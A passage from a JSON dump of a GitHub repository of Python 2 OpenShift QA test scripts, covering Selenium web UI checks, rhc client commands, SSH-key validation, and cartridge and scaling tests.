case_165723.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5842253565788269, "alphanum_fraction": 0.61183100938797, "avg_line_length": 25.08823585510254, "blob_id": "54304e78553a921c9eb977ec85d44f8028737658", "content_id": "4e3e7860cacf4aeb62bc574a3ed03d37652a1e7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1775, "license_type": "no_license", "max_line_length": 151, "num_lines": 68, "path": "/automation/open/testmodules/UI/web/case_135723.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_135723.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Change_domain(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Change domain name\n web.go_to_account_page()\n time.sleep(10)\n web.click_element_by_link_text(\"Change your namespace...\")\n web.clear_element_value(\"domain_name\")\n web.input_by_id(\"domain_name\", \"yujzhangtest11\") \n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath('''yujzhangtest11''', '''//div[@id='content']/div/div/div/div[2]/div/div[2]/div/section[2]/div/strong''') \n\n \n web.click_element_by_link_text(\"Change your namespace...\")\n web.clear_element_value(\"domain_name\")\n web.input_by_id(\"domain_name\", \"yujzhang\") \n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath('''yujzhang''', '''//div[@id='content']/div/div/div/div[2]/div/div[2]/div/section[2]/div/strong''') \n\n self.tearDown()\n\n return self.passed(\"Case 135723 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Change_domain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_135723.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5245901346206665, "avg_line_length": 14.25, "blob_id": "988a55fc0da0e032b6e0d55f2193199b7708b469", "content_id": "e4697667ae0fe191a04953c75701f87dd50b329a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 61, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/README.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Some of my practices\n====================\n\nDo some practices\n" }, { "alpha_fraction": 0.6689265370368958, "alphanum_fraction": 0.6892655491828918, "avg_line_length": 21.66666603088379, "blob_id": "bcceea8ca5677619c7cace252869b1097dc8f5be", "content_id": "3168138e7c9e980708578c765c929d222194fbac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 69, "num_lines": 39, "path": "/automation/open/testmodules/RT/cartridge/jbosseap_scaling_java6.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\n\nJul 26, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport os\nfrom shutil import rmtree\nfrom time import sleep\nfrom jbossas_java6 import JBossJava6Test\n\nclass EAPScalingJava6Test(JBossJava6Test):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types[\"jbosseap\"]\n self.config.git_repo = \"./%s\" % self.config.application_name\n self.config.scalable = True\n self.config.java_version = \"1.6\"\n\tself.config.summary = \"[US2218] Java 6 with scaling EAP application\"\n\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPScalingJava6Test)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n" }, { "alpha_fraction": 0.5204545259475708, "alphanum_fraction": 0.5261363387107849, "avg_line_length": 34.55555725097656, "blob_id": "e87b1e0d6f3193cec93657356e05b682c2a075c7", "content_id": "a037fb5337b07162669e890229cd94b96b9365e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3520, "license_type": "no_license", "max_line_length": 141, "num_lines": 99, "path": "/automation/open/testmodules/RT/client/create_app_with_option.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = \"perl-5.10\"\n self.app_name = \"testapp\"\n self.app_repo = \"/tmp/%s_repo\" %(self.app_name)\n tcms_testcase_id= 154268,142464\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass CreateAppWithOption(OpenShiftTest):\n def test_method(self):\n\n step = testcase.TestCaseStep(\"Create app with -n option\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd, False],\n expect_return=0,\n expect_string_list=[\"no local repo has been created\"],\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check git repo dir\",\n \"ls %s\" %(self.app_name),\n expect_return=\"!0\",\n expect_string_list=[\"No such file or directory\"],\n expect_description=\"There should no git repo dir\"\n )\n step.add_clean_up(common.destroy_app, [self.app_name, self.user_email, self.user_passwd])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Clean targe path to prepare the next test\",\n \"rm -rf %s && ls %s\" %(self.app_repo, self.app_repo),\n expect_return=\"!0\",\n expect_string_list=[\"No such file or directory\"],\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create app with -r option\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd, True, self.app_repo],\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check git repo is cloned to specified path\",\n \"ls %s\" %(self.app_repo),\n expect_return=0\n )\n step.add_clean_up(\"rm -rf %s\" %(self.app_repo))\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"Create app with -n/-r option\",\n self.steps_list\n )\n case.run()\n\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateAppWithOption)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4881482720375061, "alphanum_fraction": 0.4979504644870758, "avg_line_length": 37.96527862548828, "blob_id": "fd05ab079436a2dbfd8e04642b1a3e3c96a86d51", "content_id": "577d89b8a081f9d153d85f4685ecfa99f2a4c308", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5611, "license_type": "no_license", "max_line_length": 172, "num_lines": 144, "path": "/automation/open/testmodules/RT/client/rhc_tail_files_options.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf, proc\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.test_variant=self.config.test_variant\n self.app_name = \"tailoptions\" + common.getRandomString(4)\n self.testname_to_type = { \"php\" : \"php-5.3\",\n \"rack\" : \"ruby-1.8\",\n \"wsgi\" : \"python-2.6\",\n \"perl\" : \"perl-5.10\",\n \"ruby-1.9\" : \"ruby-1.9\",\n }\n self.app_type = self.testname_to_type[self.test_variant]\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n tcms_testcase_id=122404\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\ndef create_proc(cmd):\n return proc.Proc(cmd)\n\nclass RhcTailFilesOptions(OpenShiftTest):\n def test_method(self):\n case = testcase.TestCase(\"[US478][rhc-cartridge]Perl cartridge: tail/snapshot perl application files\", [])\n step = dict()\n output = dict()\n\n\n # 1.Create an php app\n step[1] = testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0\n )\n (retcode, output[1]) = step[1].run()\n # 2.Access the app to generate some access log\n app_url = OSConf.get_app_url(self.app_name)\n test_html = \"Welcome to OpenShift\"\n step[2] = testcase.TestCaseStep(\"2.Access the app to generate some access log(Not working for jbossas app)\",\n common.grep_web_page,\n function_parameters=[app_url, test_html, \"-H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0\n )\n (retcode, output[2]) = step[2].run()\n\n\n count = 2 # recording the number of step\n\n option_lst = [ \"\", # Check if access_log changes\n \"-o '-n 2'\",\n \"-o '-c 3'\",\n \"-o '-q'\",\n \"-f %s/logs/access_log* -o '-v'\" % (self.app_name),\n \"-o '--test'\",\n \"-o '-F'\",\n ]\n regex_lst = [ r\"GET / HTTP.*?curl.*?libcurl\", # Check if access_log changes\n r\"error_log.*\\n.*\\n.*\\n(?=\\n|$)\",\n r\"error_log.*\\n.{2}\\n(?=\\n|$)\",\n r\"==> %s/logs/.*?log\" % (self.app_name),\n r\"==> %s/logs/.*?log\" % (self.app_name),\n r\"/usr/bin/tail: unrecognized option '--test'\",\n r\"%s/logs/error_log\" % (self.app_name),\n ]\n for i in range(len(option_lst)):\n option = option_lst[i]\n regex = regex_lst[i]\n # 2.Run rhc tail in subprocess\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Run rhc tail in subprocess with option: '%s'\" % (count, option),\n create_proc,\n function_parameters=[\"rhc tail %s -l %s -p '%s' %s %s\" % (self.app_name, self.user_email, self.user_passwd, option, common.RHTEST_RHC_CLIENT_OPTIONS),],\n expect_description=\"rhc tail should be started\",\n )\n (retcode, output[count]) = step[count].run()\n p = retcode\n try:\n # 3.Check the option takes effect\n if i in (3,):\n exp_ret = 1\n else:\n exp_ret = 0\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Check if option: '%s' takes effect\" % (count, option),\n p.grep_output,\n function_parameters=[regex, 3, 5, 0],\n expect_description=\"Function should return %d\" % (exp_ret),\n expect_return=exp_ret\n )\n (retcode, output[count]) = step[count].run()\n finally:\n # 4.Kill the rhc tail subprocess\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Kill subprocess: rhc tail %s\" % (count, option),\n p.kill,\n function_parameters=[],\n expect_description=\"subprocess should be killed\",\n expect_return=0,\n )\n (retcode, output[count]) = step[count].run()\n \t\n\t if retcode==0:\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\t else:\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcTailFilesOptions)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5526506900787354, "alphanum_fraction": 0.5603485703468323, "avg_line_length": 37.458099365234375, "blob_id": "3371bb4f264f4dfac49388faaf3c69dd8a86a0b4", "content_id": "32c706def210ed1a11aa408888eac263cd456907", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6885, "license_type": "no_license", "max_line_length": 132, "num_lines": 179, "path": "/automation/open/testmodules/RT/cartridge/diy_customized.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 20, 2012\n\n[rhc-cartridge][US1651] Idea: Customized raw cartridges\nhttps://tcms.engineering.redhat.com/case/135842/\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport commands\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_type = 'diy'\n self.summary = \"[rhc-cartridge][US1651] Idea: Customized raw cartridges\"\n self.app_name = 'my%s%s' % ( self.app_type, common.getRandomString() )\n self.git_repo = './' + self.app_name\n self.steps = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass RawCustomized(OpenShiftTest):\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, \n common.app_types[self.app_type],\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True, self.git_repo ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Checking the new welcome message\",\n self.check_webpage_output,\n function_parameters = [ self.app_name, \n \"\", \n \"Do-It-Yourself cartridge\" ],\n expect_description = 'The proxy error-message should be customized, OpenShift branded',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Setting up custom Django application\",\n self.custom_app_setup,\n expect_description = \"Our custom Django app should be installed succesfully\",\n expect_return = 0))\n \n self.steps.append(testcase.TestCaseStep(\n \"Cheking the output of our Django project\",\n common.grep_web_page,\n function_parameters = [self.get_app_url(\"/version/\"), \"131final0\", \"-H 'Pragma: no-cache'\", 5, 4],\n expect_description = \"The output of your Django project should show the right version number\",\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Stopping the application\",\n common.stop_app,\n function_parameters = [ self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = \"The application should be stopped successfully\",\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Checking the output of the stopping Django project\",\n common.grep_web_page,\n function_parameters = [self.get_app_url(\"/version/\"), \"Service Temporarily Unavailable\", \"-H 'Pragma: no-cache'\", 5, 4],\n expect_description = 'The proxy error-message should be customized, OpenShift branded',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Starting the application\",\n common.start_app,\n function_parameters = [ self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = \"The application should be started successfully\",\n expect_return = 0))\n\n\n self.steps.append(testcase.TestCaseStep(\n \"Cheking the output of our Django project\",\n common.grep_web_page,\n function_parameters = [self.get_app_url(\"/version/\"), \n \"131final0\", \n \"-H 'Pragma: no-cache'\", 25, 4],\n expect_description = \"The output of your Django project should show the right version number\",\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def get_app_url(self, suffix=\"\"):\n def closure():\n return OSConf.get_app_url(self.app_name)+suffix\n return closure\n\n\n def custom_app_setup(self, remote_download=False):\n tmp_dir = os.path.expanduser(\"~\")\n django_tarball_name = \"django-1.3.1.tar.gz\"\n django_tarball_dir = django_tarball_name.capitalize().replace(\".tar.gz\", \"\")\n django_download_url = \"http://www.djangoproject.com/download/1.3.1/tarball/\"\n if remote_download:\n download_step = [\n \"rm -rf %s/%s\" %(tmp_dir, django_tarball_name),\n \"wget %s -O %s/%s\" % ( django_download_url, tmp_dir, django_tarball_name )\n ]\n else:\n download_step = [\n \"rm -rf %s/%s\" %(tmp_dir, django_tarball_name),\n \"cp %s/app_template/%s %s/%s\" % (WORK_DIR, django_tarball_name, tmp_dir, django_tarball_name)\n ]\n \n app_setup_steps = download_step + [\n \"cd %s\" % ( tmp_dir ),\n \"tar -xvzf %s\" % ( django_tarball_name ),\n \"cd -\",\n \"cp -Rf %s/%s/django/ %s/diy/\" % ( tmp_dir, django_tarball_dir, self.git_repo ),\n \"cp -Rf %s/app_template/django_custom/mydiyapp/ %s/diy/\" % ( WORK_DIR, self.git_repo ),\n \"cp -fv %s/app_template/django_custom/{start,stop} %s/.openshift/action_hooks/\" % ( WORK_DIR, self.git_repo ),\n \"cd %s\" % ( self.git_repo ),\n \"git add .\",\n \"git commit -a -m deployment\",\n \"git push\",\n \"rm -Rfv %s/{D,d}jango*\" % ( tmp_dir ) # cleaning up\n ]\n\n ( ret_code, ret_output) = commands.getstatusoutput(\" && \".join(app_setup_steps))\n print ret_output\n return ret_code\n\n def check_webpage_output(self, app_name, path, pattern, delay = 20):\n app_url = OSConf.get_app_url(app_name)\n return common.grep_web_page( \"http://%s/%s\" % ( app_url, path ), pattern, delay=delay )\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RawCustomized)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5725328326225281, "alphanum_fraction": 0.5779438018798828, "avg_line_length": 31.613445281982422, "blob_id": "1dac37223c2ccadd127ab2fc2f089ee122b55c99", "content_id": "85e1558cef62c0d53e8e28686e4ae27b7b634706", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3881, "license_type": "no_license", "max_line_length": 129, "num_lines": 119, "path": "/automation/open/testmodules/RT/scaling/perl_scaling_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport common\nimport OSConf\nimport rhtest\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US2004][Runtime][rhc-cartridge]Embed mysql to scalable apps: perl\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'myperl' + common.getRandomString()\n self.app_type = common.app_types[\"perl\"]\n \n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass PerlScalingMysql(OpenShiftTest):\n def check_mysql_result(self):\n app_url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"http://%s/mysql.pl\" % app_url, \"Tim Bunce, Advanced Perl DBI\", \"-H 'Pragma: no-cache'\", 5, 4)\n\n def test_method(self):\n self.add_step(\n \"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_scalable_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n\n self.add_step(\n \"embed mysql to %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0)\n\n self.add_step(\n \"Copy template files\",\n \"cp %s/cartridge/app_template/mysql/mysql.pl %s/perl/mysql.pl\" % (WORK_DIR + \"/../\", self.app_name),\n expect_description = \"Operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\n \"git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0)\n\n self.add_step(\n \"Check MySql Result\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\n \"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_count=3)\n\n for i in range(1,4):\n self.add_step(\n \"Check MySql Result - %d\" % i,\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\n \"Scale-down the application via Rest API\",\n common.scale_down,\n function_parameters = [self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_interval=5,\n try_count=6)\n\n self.add_step(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\n \"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PerlScalingMysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.521228551864624, "alphanum_fraction": 0.5273261070251465, "avg_line_length": 38.53571319580078, "blob_id": "23ef1e961339e5b181831ad55da2fdf3990f5aeb", "content_id": "6d0ee5322e97f7d89b493af1520bca050a826e80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4428, "license_type": "no_license", "max_line_length": 145, "num_lines": 112, "path": "/automation/open/testmodules/RT/client/add_sshkey_with_invalid_keyname.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.key_filename=\"my_testing_second_key\"\n self.key_filename2=\"my_testing_second_key2\"\n self.key_filename3=\"my_testing_second_key3\"\n self.new_keyname=\"second\"\n self.invalid_keyname=\"*%^+\"\n tcms_testcase_id = 129354\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass AddSshKeyWithInvalidKeyname(OpenShiftTest):\n def cleanup(self):\n os.system(\"rm -f %s*\" % (self.key_filename))\n common.remove_sshkey(self.new_keyname, self.user_email, self.user_passwd)\n\n def test_method(self):\n self.steps_list.append( testcase.TestCaseStep(\"Just for sure from previus testing... - remove that key\",\n self.cleanup,\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Create additional key\" ,\n \"ssh-keygen -t dsa -f %s -N '' \" % self.key_filename,\n expect_return=0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename), self.new_keyname, self.user_email, self.user_passwd],\n expect_return=0\n ))\n #this key shouldn't be added, because of\n self.steps_list.append(testcase.TestCaseStep(\"Create 2nd additional key\" ,\n \"ssh-keygen -t dsa -f %s -N '' \" % self.key_filename2,\n expect_return=0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add second key this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename2), self.new_keyname, self.user_email, self.user_passwd],\n expect_description=\"Should fail, because of duplicates\",\n expect_return=\"!0\",\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add second key this key to openshift with invalid key-name\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename2), self.invalid_keyname, self.user_email, self.user_passwd],\n expect_description=\"Should fail, because of invalid keyname\",\n expect_return=\"!0\",\n ))\n\n\n #check for the key type\n self.steps_list.append(testcase.TestCaseStep(\"Create additional fake key\",\n \"echo 'key' >%s.pub \" % self.key_filename3,\n expect_return=0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename3), \"fake\", self.user_email, self.user_passwd],\n expect_return=\"!0\",\n ))\n\n case = testcase.TestCase(\"[US1652][UI][CLI]add a ssh key with invalid or existing key-name\",\n steps=self.steps_list\n )\n\n case.add_clean_up(self.cleanup)\n\n case.run()\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddSshKeyWithInvalidKeyname)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6134669184684753, "alphanum_fraction": 0.6281453967094421, "avg_line_length": 33.88617706298828, "blob_id": "a200785272d7e7cbb7a94fd40a0b9e3e21398a53", "content_id": "d3477acd6931ca3a59c30883681ddd5223c37b9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4292, "license_type": "no_license", "max_line_length": 212, "num_lines": 123, "path": "/automation/open/testmodules/UI/web/case_138622.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138622.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckAppGetstartedPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n \n #create a python app\n #web.create_app(\"python-2.6\",\"python2\")\n web.go_to_create_app(\"python-2.6\")\n web.input_by_id(\"application_name\", \"python2\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''') \n\n #check wether the links are correct\n time.sleep(5)\n\n #check the \"Git version control system\" link\n web.assert_element_present_by_link_text(\"Git version control system\") \n \n #check the \"Learn more about uploading code\" link\n web.click_element_by_link_text(\"Learn more about uploading code\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''2.5. Editing and Deploying Applications''','''//h2[@id='sect-User_Guide-OpenShift_Web_Interface-Editing_and_Deploying_Applications']''')\n web.go_back()\n\n #check the \"Add a cartridge\" link\n web.click_element_by_link_text(\"Adding a cartridge\")\n time.sleep(3)\n web.assert_text_equal_by_xpath('''ADD A CARTRIDGE''','''//div[@id='content']/div/div/div/div/div/nav/ul/li[3]''')\n web.go_back()\n\n #check the \"Mysql\" link\n web.click_element_by_link_text(\"MySQL\")\n time.sleep(3)\n web.check_title(\"Add a Cartridge | OpenShift by Red Hat\")\n web.go_back()\n\n #check the \"MongoDB\" link\n web.click_element_by_link_text(\"MongoDB\")\n time.sleep(3)\n web.check_title(\"Add a Cartridge | OpenShift by Red Hat\")\n web.go_back()\n\n #check the \"Add a cartridge to your application now\" link\n web.click_element_by_link_text(\"Add a cartridge to your application now\")\n time.sleep(3)\n web.assert_text_equal_by_xpath('''ADD A CARTRIDGE''','''//div[@id='content']/div/div/div/div/div/nav/ul/li[3]''')\n web.go_back()\n\n #check the \"Follow these steps to install the client\" link\n web.click_element_by_link_text(\"Follow these steps to install the client\")\n time.sleep(3)\n web.assert_text_equal_by_xpath('''Get Started with OpenShift''','''//div[@id='content']/div/div/div/div/div/h1''')\n web.go_back()\n\n #check the \"on how to manage your application from the command line\" link\n web.click_element_by_link_text(\"on how to manage your application from the command line\")\n time.sleep(3)\n web.check_title(\"Chapter 3. OpenShift Command Line Interface - Red Hat Customer Portal\")\n web.go_back()\n\n #check the \"JBoss Developer Studio tools page.\" link\n web.click_element_by_link_text(\"JBoss Developer Studio tools page.\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''OpenShift Client Tools''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\"Jboss Develop center is missing\")\n web.go_back()\n\n #check the \"application overview page\" link\n web.click_element_by_link_text('''application overview page''')\n time.sleep(3)\n web.assert_text_equal_by_xpath('''PYTHON2''','''/html/body/div/div/div/div/div/div/nav/ul/li[2]/a''')\n web.go_back()\n \n #delete a python app\n web.delete_last_app(\"python2\")\n\n\n self.tearDown()\n\n return self.passed(\" case_138622--CheckAppGetstartedPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckAppGetstartedPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138622.py\n#\n# vim: set 